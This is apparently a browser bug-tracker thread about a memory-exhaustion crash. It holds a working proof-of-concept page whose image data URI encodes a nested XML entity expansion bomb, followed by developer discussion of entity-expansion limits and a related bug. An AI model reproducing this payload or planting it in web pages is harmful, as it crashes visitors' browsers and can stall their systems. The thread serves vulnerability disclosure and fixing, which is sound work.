User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Steps to reproduce: I create a simple html page which contains the bugged "data:image" URI in <img> tag. Obviously it can be added to any web page, and the result is the same. <html> <head> <meta charset="utf-8" /> <title>Your browser just crashed</title> </head> <body> <img alt="exploit" src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFsKPCFFTlRJVFkgYm9tYjAgImJvbWIiPgo8IUVOVElUWSBib21iMSAiJmJvbWIwOyZib21iMDsmYm9tYjA7JmJvbWIwOyZib21iMDsmYm9tYjA7JmJvbWIwOyZib21iMDsmYm9tYjA7JmJvbWIwOyZib21iMDsiPgo8IUVOVElUWSBib21iMiAiJmJvbWIxOyZib21iMTsmYm9tYjE7JmJvbWIxOyZib21iMTsmYm9tYjE7JmJvbWIxOyZib21iMTsmYm9tYjE7JmJvbWIxOyZib21iMTsiPgo8IUVOVElUWSBib21iMyAiJmJvbWIyOyZib21iMjsmYm9tYjI7JmJvbWIyOyZib21iMjsmYm9tYjI7JmJvbWIyOyZib21iMjsmYm9tYjI7JmJvbWIyOyZib21iMjsiPgo8IUVOVElUWSBib21iNCAiJmJvbWIzOyZib21iMzsmYm9tYjM7JmJvbWIzOyZib21iMzsmYm9tYjM7JmJvbWIzOyZib21iMzsmYm9tYjM7JmJvbWIzOyZib21iMzsiPgo8IUVOVElUWSBib21iNSAiJmJvbWI0OyZib21iNDsmYm9tYjQ7JmJvbWI0OyZib21iNDsmYm9tYjQ7JmJvbWI0OyZib21iNDsmYm9tYjQ7JmJvbWI0OyZib21iNDsiPgo8IUVOVElUWSBib21iNiAiJmJvbWI1OyZib21iNTsmYm9tYjU7JmJvbWI1OyZib21iNTsmYm9tYjU7JmJvbWI1OyZib21iNTsmYm9tYjU7JmJvbWI1OyZib21iNTsiPgo8IUVOVElUWSBib21iNyAiJmJvbWI2OyZib21iNjsmYm9tYjY7JmJvbWI2OyZib21iNjsmYm9tYjY7JmJvbWI2OyZib21iNjsmYm9tYjY7JmJvbWI2OyZib21iNjsiPgo8IUVOVElUWSBib21iOCAiJmJvbWI3OyZib21iNzsmYm9tYjc7JmJvbWI3OyZib21iNzsmYm9tYjc7JmJvbWI3OyZib21iNzsmYm9tYjc7JmJvbWI3OyZib21iNzsiPgo8IUVOVElUWSBib21iOSAiJmJvbWI4OyZib21iODsmYm9tYjg7JmJvbWI4OyZib21iODsmYm9tYjg7JmJvbWI4OyZib21iODsmYm9tYjg7JmJvbWI4OyZib21iODsiPgo8IUVOVElUWSBib21iMTAgIiZib21iOTsmYm9tYjk7JmJvbWI5OyZib21iOTsmYm9tYjk7JmJvbWI5OyZib21iOTsmYm9tYjk7JmJvbWI5OyZib21iOTsmYm9tYjk7Ij4KXT4KPHN2ZyB3aWR0aD0iODg4Y20iIGhlaWdodD0iNzMzY20iIHZpZXdCb3g9IjAgMCAxNTYgNzU3IiB2ZXJzaW9uPSIxLjEiCnhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiPgo8ZGVzYz5Ob25lPC9kZXNjPgo8dGV4dCB4PSI5NDIiIHk9IjYxOCIgZD0iJmJvbWIxMDsiPgo8dGV4dCB4PSI1OTMiIHk9IjMzOSIgZD0iJmJvbWIxMDsiPgo8dGV4dCB4PSIyMjUiIHk9IjY3MyIgZD0iJmJvbWIxMDsiPgo8dGV4dCB4PSI3NDkiIHk9IjIxMCIgZD0iJmJvbWIxMDsiPgo8dGV4dCB4PSIyMDQiIHk9Ijk3OSIgZD0iJmJvbWIxMDsiPgo8dGV4dCB4PSIxOTUiIHk9IjI0MyIgZD0iJmJvbWIxMDsiPgo8dGV4dCB4PSI5NTAiIHk9IjEyOSIgZD0iJmJvbWIxMDsiPgo8dGV4dCB4PSI0MTgiIHk9IjM2IiBkPSImYm9tYjEwOyI+Cjx0ZXh0IHg9Ijk1NSIgeT0iMjMiIGQ9IiZib21iMTA7Ij4KPHRleHQgeD0iODQ3IiB5PSI2ODgiIGQ9IiZib21iMTA7Ij4KPC90ZXh0Pgo8L3N2Zz4K"></img> </body> </html> Actual results: The web browser and the system could to crash if you have a little RAM memory because the browser write in RAM a lot of data and generate a lot of I/O with the HDD/SSD. This exploit could be very dangerous also for who has a lot of RAM if it is exploited well; for example with the automatic opening of other tab or pop-up with this html code. This exploit is more dangerous in GNU/linux because write in RAM about 2 GB of data instead on Windows about 400 MB. Expected results: The web browser could ignore this content inside the <img> html tag to prevent the crash of the web browser or the system

This is just a memory bomb, not exploitable except to annoy someone. Daniel: is there any reasonably limits we could put on SVG to give up before we get to this point? or is it safer to just let the memory allocator fail-safe death happen?

(In reply to Daniel Veditz [:dveditz] from comment #1) > This is just a memory bomb, not exploitable except to annoy someone. > > Daniel: is there any reasonably limits we could put on SVG to give up before > we get to this point? or is it safer to just let the memory allocator > fail-safe death happen? So, there's no point in having any SVG-specific limits here, because there's nothing SVG-specific about this. The testcase is basically just a series of elements with extremely long attribute-values (using XML entities as a trick to get extremely long values without needing much markup). You can do the exact same thing with XHTML. [Testcase coming up.] To the extent that we want to avoid this with limits, we'd need to place a limit on the length of an attribute-value, and/or a limit on the length of the document. I can imagine semi-legitimate content running up against those limits, though -- e.g. suppose a site stores an uploaded file as a base64 data URI in an attribute somewhere, and a user uploads a largeish file. We could avoid breaking those edge cases by making the limit arbitrarily huge, but that prevents us from getting any wins here, too. So, I don't know that there's much we can do here. Reclassifying as an HTML Parser bug, since we're OOM'ing in parser code. Here's a crash report that I generated from original testcase (quoted in comment 0), to demonstrate that: bp-1adb3951-2b22-43f9-9a80-a9a972150811

One other solution here might be to avoid expanding XML entities (or nested XML entities) beyond a certain length. That would make it harder for attackers to construct such a small testcase that triggers an OOM via this route. I think this might be what Chrome does -- they immediately bails on rendering either testcase, and report an XML error for an "entity reference loop". Though there's not actually a "loop" -- they seem to report this error for any nested <!ENTITY> expansion that surpasses a certain length.

This is basically the same issue as bug 616361, I think. The crash is a different place -- in bug 616361, it looks like we crash in layout, when we try to deal with a huge amount of text (based on bug 616361 comment 1). In this bug here, we crash in parsing, due to huge attribute-values. But the underlying cause is the same - nested ENTITY values being huge.